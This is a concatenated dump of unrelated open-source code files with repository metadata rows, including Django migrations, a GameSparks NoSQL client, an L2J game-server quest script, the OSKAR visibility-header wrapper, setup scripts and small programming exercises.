('rate', models.SmallIntegerField(default=1, verbose_name='rate')),
('ip', models.CharField(blank=True, max_length=20, null=True, verbose_name='ip')),
('status', models.CharField(choices=[('New', 'New'), ('True', 'True'), ('False', 'False')], default='New', max_length=10, verbose_name='status')),
('show', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='shows.Show')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
options={
'abstract': False,
},
),
]

# File: projects/migrations/0010_auto_20200217_0313.py (repo: wilbrone/Awards, license: MIT)
# Generated by Django 3.0.2 on 2020-02-17 03:13
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('projects', '0009_auto_20200217_0306'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='profile_pic',
field=models.ImageField(blank=True, default='default.png', upload_to='profile_pics'),
),
]

# File: src/news/migrations/0007_auto_20200211_0715.py (repo: HammudElHammud/newspage, license: bzip2-1.0.6)
# Generated by Django 3.0.3 on 2020-02-11 15:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('news', '0006_auto_20200210_1343'),
]
operations = [
migrations.RemoveField(
model_name='news',
name='pic',
),
migrations.AddField(
model_name='news',
name='picname',
field=models.CharField(default=1, max_length=1000),
preserve_default=False,
),
migrations.AddField(
model_name='news',
name='picurl',
field=models.CharField(default='-', max_length=1000),
),
]

# File: note/views.py (repo: DisMosGit/Dodja, license: Apache-2.0)
from rest_framework import request
from rest_framework.viewsets import ModelViewSet
from django.db.models import Q
from docker_host.permissions import IsHostOperationAllowed, HostOperationMixin
from .models import Note
from .serializer import NoteSerializer
class NoteView(ModelViewSet, HostOperationMixin):
queryset = Note.objects
serializer_class = NoteSerializer
permission_classes = [IsHostOperationAllowed]
lookup_field = 'id'
permission_kind = "no"
host_pk = "host__pk"
def get_queryset(self):
return super().get_queryset().filter(
Q(host__pk=self.kwargs.get("host__pk")),
Q(is_public=True) | Q(creator=self.request.user)).order_by('title')
def perform_create(self, serializer):
serializer.save(creator=self.request.user,
host_id=self.kwargs.get("host__pk"))

# File: Python Programs/perfect-number.py (repo: muhammad-masood-ur-rehman/Skillrack, license: CC0-1.0)
# Perfect Number
"""
Given a positive integer N as the input, the program must print yes if N is a
perfect number. Else no must be printed.
Input Format: The first line contains N.
Output Format: The first line contains yes or no.
Boundary Conditions: 1 <= N <= 999999
Example Input/Output 1:
Input: 6
Output:
yes
Example Input/Output 2:
Input: 8
Output:
no
"""
n = int(input())
divisors = [i for i in range(1, n) if n % i == 0]  # proper divisors of n
if n == sum(divisors):
    print("yes")
else:
    print("no")
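For reuse beyond a single stdin/stdout run, the same divisor-sum check can be packaged as a function; this is an illustrative sketch (the helper name `is_perfect` is ours, not part of the original SkillRack submission):

```python
def is_perfect(n):
    """Return True if n equals the sum of its proper divisors (e.g. 6 = 1 + 2 + 3)."""
    return n > 1 and n == sum(i for i in range(1, n) if n % i == 0)

# The perfect numbers below 1000:
print([n for n in range(1, 1000) if is_perfect(n)])  # -> [6, 28, 496]
```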

#!/usr/bin/env python3
# File: gs_nosql.py (repo: accidentalrebel/GameSparks-NoSQL-Python-Library, license: MIT)
import os
import requests
import json
AUTH_URL = 'https://auth.gamesparks.net/restv2/auth'
GAME_URL = 'https://config2.gamesparks.net/restv2/game/'
access_token = None
stage_base_url = None
jwt_token = None
api_key = None
def authenticate(is_live = False):
global access_token
global stage_base_url
global jwt_token
global api_key
if stage_base_url:
print('Already logged in.')
return
auth_file = open(os.path.expanduser('~') + '/.gs-auth', 'r')
auth_data = json.load(auth_file)
auth_file.close()
user_name = auth_data['user_name']
password = auth_data['password']
api_key = auth_data['api_key']
access_token = get_access_token(user_name, password)
print('Access token retrieved.')
stage_base_url = get_endpoint(access_token, api_key, is_live)
if is_live:
print('Stage Base URL for LIVE retrieved.')
else:
print('Stage Base URL for PREVIEW retrieved.')
jwt_token = get_jwt_token(access_token, api_key)
print('JWT Token retrieved.\n')
def get_access_token(username, password):
url = AUTH_URL + '/user'
res = requests.get(url, auth=requests.auth.HTTPBasicAuth(username, password))
if res.status_code != 200:
print('Invalid Credentials')
return res.json()['X-GSAccessToken']
def get_jwt_token(token, api_key):
url = AUTH_URL + '/game/' + api_key + '/jwt'
res = requests.get(url, params={ 'X-GSAccessToken': token })
if res.status_code != 200:
print('Failed to get JWT Token with ' + str(res.status_code) + ' status code.')
return res.json()['X-GS-JWT']
def get_endpoint(token, api_key, is_live):
url = GAME_URL + api_key + '/endpoints'
res = requests.get(url, params={ 'X-GSAccessToken': token })
if res.status_code != 200:
print('Failed to get end points with ' + str(res.status_code) + ' status code.')
if is_live:
return res.json()['liveNosql']
return res.json()['previewNosql']
def collection_find(collection, data):
assert isinstance(data, str)
assert stage_base_url
url = stage_base_url + '/restv2/game/' + api_key + '/mongo/collection/' + collection + '/find'
headers = {
'X-GS-JWT': jwt_token,
'Content-Type': 'application/json;charset=UTF-8',
'Accept': 'application/json'
}
res = requests.post(url, data=data, headers=headers)
if res.status_code != 200:
print('Failed to find in collection with ' + str(res.status_code) + ' status code.')
return res.json()
def collection_update(collection, data):
assert isinstance(data, str)
assert stage_base_url
url = stage_base_url + '/restv2/game/' + api_key + '/mongo/collection/' + collection + '/update'
headers = {
'X-GS-JWT': jwt_token,
'Content-Type': 'application/json;charset=UTF-8',
'Accept': 'application/json'
}
res = requests.post(url, data=data, headers=headers)
if res.status_code != 200:
print('Failed to update the collection with ' + str(res.status_code) + ' status code.')
else:
print('Successfully updated the collection')
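Both REST helpers above take the Mongo query as a pre-serialised JSON string (hence `assert isinstance(data, str)`), so a caller would typically build it with `json.dumps`. A hedged usage sketch follows; the collection name and field names are illustrative only, not part of the GameSparks API:

```python
import json

# Build the payloads as JSON strings, matching the str assertion in
# collection_find() / collection_update().
find_payload = json.dumps({"query": {"playerName": "rebel"}, "limit": 10})
update_payload = json.dumps({
    "query": {"playerName": "rebel"},
    "update": {"$set": {"score": 100}},
})

# After a successful authenticate(), the payloads pass straight through:
# rows = collection_find("playerData", find_payload)
# collection_update("playerData", update_payload)
```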

# File: chroma_core/migrations/0025_createsnapshotjob_destroysnapshotjob.py (repo: whamcloud/intel-manager-for-lustre, license: MIT)
# -*- coding: utf-8 -*-
# Generated by Django 1.11.23 on 2020-09-10 14:23
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("chroma_core", "0024_mountsnapshotjob_unmountsnapshotjob"),
]
operations = [
migrations.CreateModel(
name="CreateSnapshotJob",
fields=[
(
"job_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="chroma_core.Job",
),
),
("fqdn", models.CharField(help_text=b"MGS host to create the snapshot on", max_length=256)),
("fsname", models.CharField(help_text=b"Lustre filesystem name", max_length=8)),
("name", models.CharField(help_text=b"Snapshot to create", max_length=64)),
(
"comment",
models.CharField(help_text=b"Optional comment for the snapshot", max_length=1024, null=True),
),
(
"use_barrier",
models.BooleanField(
default=False,
help_text=b"Set write barrier before creating snapshot. The default value is False",
),
),
],
options={
"ordering": ["id"],
},
bases=("chroma_core.job",),
),
migrations.CreateModel(
name="DestroySnapshotJob",
fields=[
(
"job_ptr",
models.OneToOneField(
auto_created=True,
on_delete=django.db.models.deletion.CASCADE,
parent_link=True,
primary_key=True,
serialize=False,
to="chroma_core.Job",
),
),
("fqdn", models.CharField(help_text=b"MGS host to destroy the snapshot on", max_length=256)),
("fsname", models.CharField(help_text=b"Lustre filesystem name", max_length=8)),
("name", models.CharField(help_text=b"Snapshot to destroy", max_length=64)),
("force", models.BooleanField(default=False, help_text=b"Destroy the snapshot with force")),
],
options={
"ordering": ["id"],
},
bases=("chroma_core.job",),
),
]

# File: easy/maximum number of words you can type/solurion.py (repo: ilya-sokolov/leetcode, license: MIT)
class Solution:
def canBeTypedWords(self, text: str, brokenLetters: str) -> int:
result = 0
words = text.split(" ")
set_chars = set(brokenLetters)
for i in words:
set_word = set(i)
sub = set_word - set_chars
if len(set_word) == len(sub):
result += 1
return result
s = Solution()
print(s.canBeTypedWords("hello world", "ad"))
print(s.canBeTypedWords("leet code", "lt"))
print(s.canBeTypedWords("leet code", "e"))
print(s.canBeTypedWords("assembly is the best", "z"))
| 29.684211 | 68 | 0.585106 | 70 | 564 | 4.642857 | 0.542857 | 0.073846 | 0.258462 | 0.153846 | 0.178462 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004902 | 0.276596 | 564 | 18 | 69 | 31.333333 | 0.791667 | 0 | 0 | 0 | 0 | 0 | 0.099291 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0 | 0 | 0.1875 | 0.25 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb4db26251eb639d46ce3715d1158347bc8822e9 | 864 | py | Python | examples/main.py | vnpnh/Pyvalo | ca9594ab4eb5620c0c5ef4d0fe0e139353986520 | [
"MIT"
] | null | null | null | examples/main.py | vnpnh/Pyvalo | ca9594ab4eb5620c0c5ef4d0fe0e139353986520 | [
"MIT"
] | null | null | null | examples/main.py | vnpnh/Pyvalo | ca9594ab4eb5620c0c5ef4d0fe0e139353986520 | [
"MIT"
] | null | null | null | import valorant
from valorant.utils.gameplay import check_buy_phase
from valorant.utils.gameplay import enemy_score_info, own_score_info
import time
from valorant.utils.helper import apply_config
# default config
# valo = valorant.config()
# custom config
valo = valorant.config(tesseract=r'D:\Program Files\Tesseract-OCR\tesseract.exe')
print(valo.__module__)
"""
Tesseract Path: D:\Program Files\Tesseract-OCR\tesseract.exe
check_money_pos: (250, 120, 110, 55)
check_buy_phase Path: (810, 140, 310, 140)
enemy_score_info: (750, 25, 100, 55)
own_score_info Path: (1050, 25, 100, 55)
time_left_pos: (900, 25, 100, 55)
failsafe Path: True
"""
print(valo.buy_phase_coor) # (810, 140, 310, 140)
print("======")
# print(isinstance(valo, valo.__module__))
# print(check_buy_phase(valo))
time.sleep(1)
print(enemy_score_info(valo))
# print(own_score_info())

# File: login/migrations/0005_employee_username.py (repo: mankek/Time-Tracker, license: MIT)
# Generated by Django 2.1 on 2018-10-10 22:21
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('login', '0004_auto_20181010_1640'),
]
operations = [
migrations.AddField(
model_name='employee',
name='Username',
field=models.CharField(default='None', max_length=50),
preserve_default=False,
),
]
| 21.8 | 66 | 0.600917 | 46 | 436 | 5.565217 | 0.826087 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.102894 | 0.286697 | 436 | 19 | 67 | 22.947368 | 0.720257 | 0.098624 | 0 | 0 | 1 | 0 | 0.122762 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.076923 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb4f6cecef3858e27583257bcccf7772bacf1898 | 3,345 | py | Python | datapack/data/scripts/custom/6667_ClanManager/__init__.py | DigitalCoin1/L2SPERO | f9ec069804d7bf13f9c4bfb508db2eb6ce37ab94 | [
"Unlicense"
] | null | null | null | datapack/data/scripts/custom/6667_ClanManager/__init__.py | DigitalCoin1/L2SPERO | f9ec069804d7bf13f9c4bfb508db2eb6ce37ab94 | [
"Unlicense"
] | null | null | null | datapack/data/scripts/custom/6667_ClanManager/__init__.py | DigitalCoin1/L2SPERO | f9ec069804d7bf13f9c4bfb508db2eb6ce37ab94 | [
"Unlicense"
] | null | null | null | import sys
from com.l2jfrozen.gameserver.model.actor.instance import L2PcInstance
from com.l2jfrozen.gameserver.model.actor.instance import L2NpcInstance
from java.util import Iterator
from com.l2jfrozen.util.database import L2DatabaseFactory
from com.l2jfrozen.gameserver.model.quest import State
from com.l2jfrozen.gameserver.model.quest import QuestState
from com.l2jfrozen.gameserver.model.quest.jython import QuestJython as JQuest
qn = "6667_ClanManager"
NPC=[66667]
REQUESTED_ITEM=3470
REQUESTED_AMOUNT=2
NEW_REP_SCORE=3000000
QuestId = 6667
QuestName = "ClanManager"
QuestDesc = "custom"
InitialHtml = "66667-1.htm"
print "INFO Clan Manager (66667) Enabled..."
class Quest (JQuest) :
def __init__(self,id,name,descr): JQuest.__init__(self,id,name,descr)
def onEvent(self,event,st):
htmltext = "<html><head><body>I have nothing to say you</body></html>"
count=st.getQuestItemsCount(REQUESTED_ITEM)
if event == "66667-clanOk.htm" :
if st.getPlayer().isClanLeader() and st.getPlayer().getClan().getLevel()<8:
if st.getPlayer().isNoble() and count >= REQUESTED_AMOUNT:
htmltext=event
st.getPlayer().getClan().changeLevel(8)
st.playSound("ItemSound.quest_finish")
st.takeItems(REQUESTED_ITEM,REQUESTED_AMOUNT)
else :
htmltext="66667-no_clan.htm"
st.exitQuest(1)
else :
htmltext="66667-no_clan.htm"
st.exitQuest(1)
elif event == "66667-repOk.htm" :
if st.getPlayer().isClanLeader() and st.getPlayer().getClan().getLevel() >= 5 and st.getPlayer().getClan().getReputationScore() < NEW_REP_SCORE :
    if st.getPlayer().isNoble() and count >= REQUESTED_AMOUNT:
htmltext=event
st.getPlayer().getClan().setReputationScore(NEW_REP_SCORE, 1);
st.playSound("ItemSound.quest_finish")
st.takeItems(REQUESTED_ITEM,REQUESTED_AMOUNT)
else :
htmltext="66667-no_points.htm"
st.exitQuest(1)
else :
htmltext="66667-no_points.htm"
st.exitQuest(1)
return htmltext
def onTalk (self,npc,player):
htmltext = "<html><head><body>I have nothing to say you</body></html>"
st = player.getQuestState(qn)
if not st : return htmltext
npcId = npc.getNpcId()
id = st.getState()
if id == CREATED :
htmltext="66667-1.htm"
elif id == COMPLETED :
htmltext = "<html><head><body>This quest have already been completed.</body></html>"
else :
st.exitQuest(1)
return htmltext
QUEST = Quest(6667,qn,"custom")
CREATED = State('Start', QUEST)
STARTING = State('Starting', QUEST)
STARTED = State('Started', QUEST)
COMPLETED = State('Completed', QUEST)
QUEST.setInitialState(CREATED)
for npcId in NPC:
QUEST.addStartNpc(npcId)
QUEST.addTalkId(npcId)

# File: python/oskar/vis_header.py (repo: happyseayou/OSKAR, license: BSD-3-Clause)
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016-2020, The University of Oxford
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the University of Oxford nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
"""Interfaces to the OSKAR visibility header."""
from __future__ import absolute_import, division, print_function
from oskar.binary import Binary
try:
from . import _vis_header_lib
except ImportError:
_vis_header_lib = None
# pylint: disable=useless-object-inheritance
class VisHeader(object):
"""This class provides a Python interface to an OSKAR visibility header.
The :class:`oskar.VisHeader` class encapsulates the small amount of
metadata used to describe a visibility data set generated by OSKAR, and
it will be saved as part of any visibility data files written by the
:class:`oskar.Interferometer` class.
To load the header data from an OSKAR visibility binary file (note this
is not a CASA Measurement Set, although it can be converted into one),
use the :meth:`read() <oskar.VisHeader.read>` class method. This will
return a tuple containing both the header data and also a handle to the
binary file, which can be used to read subsequent :class:`oskar.VisBlock`
data structures from the same file.
The visibility data header for the current simulation can be returned
using the method :meth:`oskar.Interferometer.vis_header` if required.
Examples:
To load the header from a file ``example.vis`` and print some values
from it:
>>> (header, handle) = oskar.VisHeader.read('example.vis')
>>> print(header.num_blocks)
3
>>> print(header.num_times_total)
24
>>> print(header.num_channels_total)
3
>>> print(header.freq_start_hz)
100000000.0
>>> print(header.freq_inc_hz)
20000000.0
>>> print(header.phase_centre_ra_deg)
20.0
>>> print(header.phase_centre_dec_deg)
-29.999999999999996
"""
def __init__(self):
"""Constructs a handle to a visibility header."""
if _vis_header_lib is None:
raise RuntimeError("OSKAR library not found.")
self._capsule = None
def capsule_ensure(self):
"""Ensures the C capsule exists."""
if self._capsule is None:
raise RuntimeError(
"Call Interferometer.vis_header() for the visibility header.")
def capsule_get(self):
"""Returns the C capsule wrapped by the class."""
return self._capsule
def capsule_set(self, new_capsule):
"""Sets the C capsule wrapped by the class.
Args:
new_capsule (capsule): The new capsule to set.
"""
if _vis_header_lib.capsule_name(new_capsule) == 'oskar_VisHeader':
del self._capsule
self._capsule = new_capsule
else:
raise RuntimeError("Capsule is not of type oskar_VisHeader.")
def get_amp_type(self):
"""Returns the OSKAR data type of the visibility amplitude array."""
self.capsule_ensure()
return _vis_header_lib.amp_type(self._capsule)
def get_channel_bandwidth_hz(self):
"""Returns the width of each frequency channel, in Hz."""
self.capsule_ensure()
return _vis_header_lib.channel_bandwidth_hz(self._capsule)
def get_coord_precision(self):
"""Returns the OSKAR data type of the baseline coordinate arrays."""
self.capsule_ensure()
return _vis_header_lib.coord_precision(self._capsule)
def get_freq_inc_hz(self):
"""Returns the frequency channel increment, in Hz."""
self.capsule_ensure()
return _vis_header_lib.freq_inc_hz(self._capsule)
def get_freq_start_hz(self):
"""Returns the frequency of the first channel, in Hz."""
self.capsule_ensure()
return _vis_header_lib.freq_start_hz(self._capsule)
def get_max_channels_per_block(self):
"""Returns the maximum number of channels per visibility block."""
self.capsule_ensure()
return _vis_header_lib.max_channels_per_block(self._capsule)
def get_max_times_per_block(self):
"""Returns the maximum number of time samples per visibility block."""
self.capsule_ensure()
return _vis_header_lib.max_times_per_block(self._capsule)
def get_num_blocks(self):
"""Returns the expected number of visibility blocks for a run."""
self.capsule_ensure()
return _vis_header_lib.num_blocks(self._capsule)
def get_num_channels_total(self):
"""Returns the total number of frequency channels."""
self.capsule_ensure()
return _vis_header_lib.num_channels_total(self._capsule)
def get_num_stations(self):
"""Returns the number of stations."""
self.capsule_ensure()
return _vis_header_lib.num_stations(self._capsule)
def get_num_tags_per_block(self):
"""Returns the number of binary data tags per visibility block."""
self.capsule_ensure()
return _vis_header_lib.num_tags_per_block(self._capsule)
def get_num_times_total(self):
"""Returns the total number of time samples."""
self.capsule_ensure()
return _vis_header_lib.num_times_total(self._capsule)
def get_phase_centre_ra_deg(self):
"""Returns the phase centre Right Ascension, in degrees."""
self.capsule_ensure()
return _vis_header_lib.phase_centre_ra_deg(self._capsule)
def get_phase_centre_dec_deg(self):
"""Returns the phase centre Declination, in degrees."""
self.capsule_ensure()
return _vis_header_lib.phase_centre_dec_deg(self._capsule)
def get_time_start_mjd_utc(self):
"""Returns the start time, as MJD(UTC)."""
self.capsule_ensure()
return _vis_header_lib.time_start_mjd_utc(self._capsule)
def get_time_inc_sec(self):
"""Returns the time increment, in seconds."""
self.capsule_ensure()
return _vis_header_lib.time_inc_sec(self._capsule)
def get_time_average_sec(self):
"""Returns the time averaging period, in seconds."""
self.capsule_ensure()
return _vis_header_lib.time_average_sec(self._capsule)
# Properties
amp_type = property(get_amp_type)
capsule = property(capsule_get, capsule_set)
channel_bandwidth_hz = property(get_channel_bandwidth_hz)
coord_precision = property(get_coord_precision)
freq_inc_hz = property(get_freq_inc_hz)
freq_start_hz = property(get_freq_start_hz)
max_channels_per_block = property(get_max_channels_per_block)
max_times_per_block = property(get_max_times_per_block)
num_blocks = property(get_num_blocks)
num_channels_total = property(get_num_channels_total)
num_stations = property(get_num_stations)
num_tags_per_block = property(get_num_tags_per_block)
num_times_total = property(get_num_times_total)
phase_centre_ra_deg = property(get_phase_centre_ra_deg)
phase_centre_dec_deg = property(get_phase_centre_dec_deg)
time_start_mjd_utc = property(get_time_start_mjd_utc)
time_inc_sec = property(get_time_inc_sec)
time_average_sec = property(get_time_average_sec)
@classmethod
def read(cls, binary_file):
"""Reads a visibility header from an OSKAR binary file and returns it.
Args:
binary_file (str or oskar.Binary):
Path or handle to an OSKAR binary file.
Returns:
tuple: A two-element tuple containing the visibility header and
a handle to the OSKAR binary file, opened for reading.
"""
if _vis_header_lib is None:
raise RuntimeError("OSKAR library not found.")
hdr = VisHeader()
if isinstance(binary_file, Binary):
hdr.capsule = _vis_header_lib.read_header(binary_file.capsule)
return (hdr, binary_file)
fhan = Binary(binary_file, b'r')
hdr.capsule = _vis_header_lib.read_header(fhan.capsule)
return (hdr, fhan)
| 40.370213 | 79 | 0.702013 | 1,296 | 9,487 | 4.87963 | 0.23071 | 0.067837 | 0.045541 | 0.061828 | 0.354839 | 0.243359 | 0.221695 | 0.172676 | 0.120177 | 0.120177 | 0 | 0.007459 | 0.222726 | 9,487 | 234 | 80 | 40.542735 | 0.850149 | 0.464847 | 0 | 0.203884 | 0 | 0 | 0.034329 | 0.005722 | 0 | 0 | 0 | 0 | 0 | 1 | 0.213592 | false | 0 | 0.038835 | 0 | 0.631068 | 0.009709 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb513c7cb4cfaba75c9bb580d5d1718b16468f02 | 463 | py | Python | etc/setup.py | c4s4/mysql_commando | def44e111e4e6438d7bc4e0f407c38af86e98880 | [
"Apache-2.0"
] | 2 | 2016-07-27T12:59:47.000Z | 2019-11-30T14:24:56.000Z | etc/setup.py | c4s4/mysql_commando | def44e111e4e6438d7bc4e0f407c38af86e98880 | [
"Apache-2.0"
] | null | null | null | etc/setup.py | c4s4/mysql_commando | def44e111e4e6438d7bc4e0f407c38af86e98880 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# encoding: UTF-8
from distutils.core import setup
setup(
name = 'mysql_commando',
version = 'VERSION',
author = 'Michel Casabianca',
author_email = 'casa@sweetohm.net',
packages = ['mysql_commando'],
url = 'http://pypi.python.org/pypi/mysql_commando/',
license = 'Apache Software License',
    description = 'mysql_commando is a MySQL driver calling the mysql command-line client',
long_description=open('README.rst').read(),
)
| 27.235294 | 69 | 0.680346 | 56 | 463 | 5.517857 | 0.75 | 0.168285 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002632 | 0.179266 | 463 | 16 | 70 | 28.9375 | 0.810526 | 0.077754 | 0 | 0 | 0 | 0 | 0.454118 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb58ba0f491c210148b7b90b9abe97b2078c4465 | 1,031 | py | Python | utils/yaml_helper.py | jiaqi-w/machine_learning | faf21f355d1d6d9de720ae77cbff3442db5cebc7 | [
"MIT"
] | 1 | 2018-10-29T16:55:07.000Z | 2018-10-29T16:55:07.000Z | utils/yaml_helper.py | jiaqi-w/machine_learning | faf21f355d1d6d9de720ae77cbff3442db5cebc7 | [
"MIT"
] | null | null | null | utils/yaml_helper.py | jiaqi-w/machine_learning | faf21f355d1d6d9de720ae77cbff3442db5cebc7 | [
"MIT"
] | null | null | null | import yaml
class Yaml_Helper():
def __init__(self, config_fname):
self.config = self.load_config(config_fname) or {}
    @staticmethod
    def load_config(config_fname):
        """
        Loads the YAML configuration file config_fname and returns its
        contents as a dictionary.
        :param config_fname: path to the YAML configuration file
        :return: dictionary of config values
        """
        with open(config_fname) as config_file:
            # safe_load avoids constructing arbitrary Python objects
            # (yaml.load without an explicit Loader is deprecated and unsafe).
            conf = yaml.safe_load(config_file)
        return conf
    def add_config(self, config_fname, should_override=False):
        """
        Merges the configuration from config_fname into the current config.
        Missing keys are always added; keys that already exist are
        overwritten only when should_override is True.
        :param config_fname: path to the YAML configuration file to merge
        :param should_override: overwrite keys that already exist
        """
        default = self.load_config(config_fname)
        for key in default:
            if key not in self.config or should_override:
                self.config[key] = default[key]
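The merge rule implemented by `add_config` above (missing keys are always added, existing keys are replaced only when `should_override` is set) is easiest to see on plain dictionaries; `merge_config` below is a hypothetical stand-alone version without the YAML loading:

```python
def merge_config(config, default, should_override=False):
    # Same semantics as Yaml_Helper.add_config, minus the YAML file I/O:
    # add keys that are missing, overwrite existing ones only on request.
    merged = dict(config)
    for key in default:
        if key not in merged or should_override:
            merged[key] = default[key]
    return merged

base = {"host": "localhost", "port": 5000}
extra = {"port": 8080, "debug": True}
kept = merge_config(base, extra)               # port stays 5000
overridden = merge_config(base, extra, True)   # port becomes 8080
```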
| 34.366667 | 82 | 0.643065 | 132 | 1,031 | 4.848485 | 0.424242 | 0.120313 | 0.075 | 0.098438 | 0.078125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.29001 | 1,031 | 29 | 83 | 35.551724 | 0.874317 | 0.342386 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.214286 | false | 0 | 0.071429 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb5a4a304b4822606cb8420489013996cae942be | 1,163 | py | Python | setup.py | simon-ball/nqo-mfs | 54bc84deb6ac0ab1dec724fee69c0d7b7c0ce3e9 | [
"MIT"
] | null | null | null | setup.py | simon-ball/nqo-mfs | 54bc84deb6ac0ab1dec724fee69c0d7b7c0ce3e9 | [
"MIT"
] | 1 | 2020-10-23T11:10:23.000Z | 2020-10-23T11:10:23.000Z | setup.py | simon-ball/nqo-mfs | 54bc84deb6ac0ab1dec724fee69c0d7b7c0ce3e9 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""The setup script."""
from setuptools import setup, find_packages
from os import path
here = path.abspath(path.dirname(__file__))
with open('README.md') as readme_file:
readme = readme_file.read()
with open(path.join(here, 'requirements.txt')) as f:
requirements = f.read().split()
setup(
author="Simon Ball",
author_email='s.w.ball@st-aidans.com',
classifiers=[
        'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Natural Language :: English',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
],
description="Magnetic field visualisation code from the NQO group at SDU.",
install_requires=requirements,
long_description=readme,
include_package_data=True,
keywords='physics magnetism magnets',
name='mfs',
packages=find_packages(include=['mfs*']),
url='https://github.com/simon-ball/nqo-mfs',
version='1.1.1',
zip_safe=False,
) | 27.690476 | 79 | 0.647463 | 141 | 1,163 | 5.241135 | 0.595745 | 0.128552 | 0.169148 | 0.175913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014085 | 0.206363 | 1,163 | 42 | 80 | 27.690476 | 0.786566 | 0.032674 | 0 | 0 | 0 | 0 | 0.415179 | 0.019643 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.064516 | 0 | 0.064516 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
bb5a673684a9f6feb55f8f7a0216913522c44b45 | 8,832 | py | Python | deeppavlov/models/go_bot/dto/dataset_features.py | xbodx/DeepPavlov | 4b60bf162df4294b8b0db3b72786cdd699c674fa | [
"Apache-2.0"
